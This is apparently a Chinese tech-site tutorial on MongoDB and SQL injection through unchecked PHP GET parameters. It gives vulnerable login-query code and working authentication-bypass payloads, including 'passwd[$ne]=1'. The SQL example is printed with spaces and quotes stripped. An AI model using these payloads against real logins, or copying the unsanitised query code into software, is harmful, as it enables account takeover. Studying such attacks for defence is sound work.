怎样利用GET参数判断不严格进行MongoDB注入

发布时间:2021-09-29 09:59:33 作者:柒染
来源:亿速云 阅读:174

本篇文章给大家分享的是有关怎样利用GET参数判断不严格进行MongoDB注入,小编觉得挺实用的,因此分享给大家学习,希望大家阅读完这篇文章后可以有所收获,话不多说,跟着小编一起来看看吧。

  在关系型数据库时代,SQL注入攻防几乎成了每一个Web开发者的必修课,很多NoSQL的支持者称NoSQL的同时也就NoSQL注入了。

  怎样利用GET参数判断不严格进行MongoDB注入

  使用SQL数据库存储用户名密码的系统,我们检测用户名与密码的过程可能是这样的:

  mysql_query("SELECT*FROMuser

  WHEREusername=".$_GET['username'].",

  ANDpasswd=".$_GET['passwd'])

  我们使用MongoDB进行最简单的用户名与密码检测可能是这样的:

  $collection->find(array(

  "username"=>$_GET['username'],

  "passwd"=>$_GET['passwd']

  ));

  怎样利用GET参数判断不严格进行MongoDB注入

  在最普通的SQL注入中,我们可以构造下面这样的请求:

  login.php?username=admin&passwd=abcOR1–

  这个请求会形成这样的SQL语句:

  SELECT*FROMuserWHEREusername=adminANDpasswd=abcOR1;

  成功注入!

  采用同理的方法,针对上面的MongoDB查询方式,你可以构造下面的请求:

  login.php?username=admin&passwd[$ne]=1

  这个请求会形成这样的MongoDB查询:

  $collection->find(array(

  "username"=>"admin",

  "passwd"=>array("$ne"=>1)

  ));

  成功注入!

以上就是怎样利用GET参数判断不严格进行MongoDB注入,小编相信有部分知识点可能是我们日常工作会见到或用到的。希望你能通过这篇文章学到更多知识。更多详情敬请关注亿速云行业资讯频道。

推荐阅读:
  1. 怎么利用ibatis对sql进行注入
  2. 利用JavaScript如何实现判断对象中包不包含某个属性

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

get mongodb

上一篇:如何让PHP程序员的技术成长

下一篇:如何利用及修复ThinkPHP框架任意代码执行漏洞

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》